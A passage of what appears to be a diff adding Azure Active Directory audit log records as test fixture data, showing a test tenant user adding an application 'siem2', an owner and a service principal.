{"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "33cdc459-1335-4d6c-b773-f5eef4df7793"}, {"Name": "extendedAuditEventCategory", "Value": "Application"}, {"Name": "targetName", "Value": "siem2"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"AppId\",\"AvailableToOtherTenants\",\"DisplayName\",\"RequiredResourceAccess\"]"}, {"Name": "correlationId", "Value": "484659af-7387-4b77-b889-c4d2a8060004"}, {"Name": "version", "Value": "2"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-11T16:36:30.6833528Z"}, {"Name": "env_epoch", "Value": "SDA9U"}, {"Name": "env_seqNum", "Value": "41554400"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##9758fd77-23a7-4fdc-951a-f9200b1a4af9_00000000-0000-0000-0000-000000000000_9758fd77-23a7-4fdc-951a-f9200b1a4af9"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR521"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add application.", "Id": "689aaff0-b34f-4077-9244-0563b9f9c03b"}
+{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-11T16:36:30", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "Application_33cdc459-1335-4d6c-b773-f5eef4df7793"}, {"Type": 2, "ID": "33cdc459-1335-4d6c-b773-f5eef4df7793"}, {"Type": 2, "ID": "Application"}, {"Type": 1, "ID": "siem2"}], "ObjectId": "Not Available", "ModifiedProperties": [{"Name": "AppId", "OldValue": "[]", "NewValue": "[\r\n  \"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"\r\n]"}, {"NewValue": "[\r\n  false\r\n]", "OldValue": "[]", "Name": "AvailableToOtherTenants"}, {"Name": "DisplayName", "OldValue": "[]", "NewValue": "[\r\n  \"siem2\"\r\n]"}, {"Name": "RequiredResourceAccess", "OldValue": "[]", "NewValue": "[\r\n  {\r\n    \"ResourceAppId\": \"00000003-0000-0000-c000-000000000000\",\r\n    \"RequiredAppPermissions\": [\r\n      {\r\n        \"EntitlementId\": \"e1fe6dd8-ba31-4d61-89e7-88639da4683d\",\r\n        \"DirectAccessGrant\": false,\r\n        \"ImpersonationAccessGrants\": [\r\n          20\r\n        ]\r\n      }\r\n    ],\r\n    \"EncodingVersion\": 1\r\n  }\r\n]"}, {"Name": "Included Updated Properties", "OldValue": "", "NewValue": "AppId, AvailableToOtherTenants, DisplayName, RequiredResourceAccess"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "33cdc459-1335-4d6c-b773-f5eef4df7793"}, {"Name": "extendedAuditEventCategory", "Value": "Application"}, {"Name": "targetName", "Value": "siem2"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"AppId\",\"AvailableToOtherTenants\",\"DisplayName\",\"RequiredResourceAccess\"]"}, {"Name": "correlationId", "Value": "484659af-7387-4b77-b889-c4d2a8060004"}, {"Name": "version", "Value": "2"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-11T16:36:30.6833528Z"}, {"Name": "env_epoch", "Value": "SDA9U"}, {"Name": "env_seqNum", "Value": "41554400"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##9758fd77-23a7-4fdc-951a-f9200b1a4af9_00000000-0000-0000-0000-000000000000_9758fd77-23a7-4fdc-951a-f9200b1a4af9"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR521"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add application.", "Id": "689aaff0-b34f-4077-9244-0563b9f9c03b"}
+{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-11T16:36:30", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "ObjectId": "asr@testsiem.onmicrosoft.com", "ModifiedProperties": [{"Name": "Application.ObjectID", "OldValue": "", "NewValue": "33cdc459-1335-4d6c-b773-f5eef4df7793"}, {"Name": "Application.DisplayName", "OldValue": "", "NewValue": "siem2"}, {"Name": "Application.AppId", "OldValue": "", "NewValue": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "extendedAuditEventCategory", "Value": "Application"}, {"Name": "targetUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "targetPUID", "Value": "1003200096971F55"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"Application.ObjectID\",\"Application.DisplayName\",\"Application.AppId\"]"}, {"Name": "correlationId", "Value": "484659af-7387-4b77-b889-c4d2a8060004"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\",\"DisplayName\":\"siem2\",\"ObjectClass\":\"Application\",\"AppId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-11T16:36:30.7383513Z"}, {"Name": "env_epoch", "Value": "SDA9U"}, {"Name": "env_seqNum", "Value": "41554439"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##9758fd77-23a7-4fdc-951a-f9200b1a4af9_00000000-0000-0000-0000-000000000000_9758fd77-23a7-4fdc-951a-f9200b1a4af9"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR521"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add owner to application.", "Id": "ccbe264f-f6bc-42bd-b5b6-2893ce2f465f"}
+{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-11T16:36:31", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Type": 2, "ID": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "siem2"}, {"Type": 2, "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Type": 4, "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}], "ObjectId": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", "ModifiedProperties": [{"Name": "AccountEnabled", "OldValue": "[]", "NewValue": "[\r\n  true\r\n]"}, {"Name": "AppPrincipalId", "OldValue": "[]", "NewValue": "[\r\n  \"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"\r\n]"}, {"Name": "DisplayName", "OldValue": "[]", "NewValue": "[\r\n  \"siem2\"\r\n]"}, {"Name": "ServicePrincipalName", "OldValue": "[]", "NewValue": "[\r\n  \"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"\r\n]"}, {"Name": "Credential", "OldValue": "[]", "NewValue": "[\r\n  {\r\n    \"CredentialType\": 2,\r\n    \"KeyStoreId\": \"291154f0-a9f5-45bb-87be-9c8ee5b6d62c\",\r\n    \"KeyGroupId\": \"291154f0-a9f5-45bb-87be-9c8ee5b6d62c\"\r\n  }\r\n]"}, {"Name": "Included Updated Properties", "OldValue": "", "NewValue": "AccountEnabled, AppPrincipalId, DisplayName, ServicePrincipalName, Credential"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Name": "targetName", "Value": "siem2"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"AccountEnabled\",\"AppPrincipalId\",\"DisplayName\",\"ServicePrincipalName\",\"Credential\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "381d015d-6660-4dce-af99-4cd8c3b61d4d"}, {"Name": "version", "Value": "2"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-11T16:36:31.1327910Z"}, {"Name": "env_epoch", "Value": "NNJOH"}, {"Name": "env_seqNum", "Value": "39121960"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##d409567a-16bf-49cb-a4c9-cb4608f62168_00000000-0000-0000-0000-000000000000_d409567a-16bf-49cb-a4c9-cb4608f62168"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR568"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add service principal.", "Id": "48403af8-b712-4e63-a999-686b631240ac"}
+{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-11T16:36:31", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Type": 2, "ID": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "siem2"}, {"Type": 2, "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Type": 4, "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}], "ObjectId": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", "ModifiedProperties": [{"Name": "AccountEnabled", "OldValue": "[]", "NewValue": "[\r\n  true\r\n]"}, {"Name": "AppPrincipalId", "OldValue": "[]", "NewValue": "[\r\n  \"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"\r\n]"}, {"NewValue": "[\r\n  \"siem2\"\r\n]", "OldValue": "[]", "Name": "DisplayName"}, {"Name": "ServicePrincipalName", "OldValue": "[]", "NewValue": "[\r\n  \"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"\r\n]"}, {"NewValue": "[\r\n  {\r\n    \"CredentialType\": 2,\r\n    \"KeyStoreId\": \"291154f0-a9f5-45bb-87be-9c8ee5b6d62c\",\r\n    \"KeyGroupId\": \"291154f0-a9f5-45bb-87be-9c8ee5b6d62c\"\r\n  }\r\n]", "OldValue": "[]", "Name": "Credential"}, {"Name": "Included Updated Properties", "OldValue": "", "NewValue": "AccountEnabled, AppPrincipalId, DisplayName, ServicePrincipalName, Credential"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Name": "targetName", "Value": "siem2"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"AccountEnabled\",\"AppPrincipalId\",\"DisplayName\",\"ServicePrincipalName\",\"Credential\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "381d015d-6660-4dce-af99-4cd8c3b61d4d"}, {"Name": "version", "Value": "2"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-11T16:36:31.1327910Z"}, {"Name": "env_epoch", "Value": "NNJOH"}, {"Name": "env_seqNum", "Value": "39121960"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##d409567a-16bf-49cb-a4c9-cb4608f62168_00000000-0000-0000-0000-000000000000_d409567a-16bf-49cb-a4c9-cb4608f62168"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR568"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add service principal.", "Id": "48403af8-b712-4e63-a999-686b631240ac"}
+{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-11T16:36:31", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Type": 2, "ID": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "siem2"}, {"Type": 2, "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Type": 4, "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}], "ObjectId": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", "ModifiedProperties": [{"NewValue": "[\r\n  true\r\n]", "OldValue": "[]", "Name": "AccountEnabled"}, {"Name": "AppPrincipalId", "OldValue": "[]", "NewValue": "[\r\n  \"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"\r\n]"}, {"Name": "DisplayName", "OldValue": "[]", "NewValue": "[\r\n  \"siem2\"\r\n]"}, {"Name": "ServicePrincipalName", "OldValue": "[]", "NewValue": "[\r\n  \"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"\r\n]"}, {"Name": "Credential", "OldValue": "[]", "NewValue": "[\r\n  {\r\n    \"CredentialType\": 2,\r\n    \"KeyStoreId\": \"291154f0-a9f5-45bb-87be-9c8ee5b6d62c\",\r\n    \"KeyGroupId\": \"291154f0-a9f5-45bb-87be-9c8ee5b6d62c\"\r\n  }\r\n]"}, {"Name": "Included Updated Properties", "OldValue": "", "NewValue": "AccountEnabled, AppPrincipalId, DisplayName, ServicePrincipalName, Credential"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Name": "targetName", "Value": "siem2"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"AccountEnabled\",\"AppPrincipalId\",\"DisplayName\",\"ServicePrincipalName\",\"Credential\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "381d015d-6660-4dce-af99-4cd8c3b61d4d"}, {"Name": "version", "Value": "2"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-11T16:36:31.1327910Z"}, {"Name": "env_epoch", "Value": "NNJOH"}, {"Name": "env_seqNum", "Value": "39121960"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##d409567a-16bf-49cb-a4c9-cb4608f62168_00000000-0000-0000-0000-000000000000_d409567a-16bf-49cb-a4c9-cb4608f62168"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR568"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add service principal.", "Id": "48403af8-b712-4e63-a999-686b631240ac"}
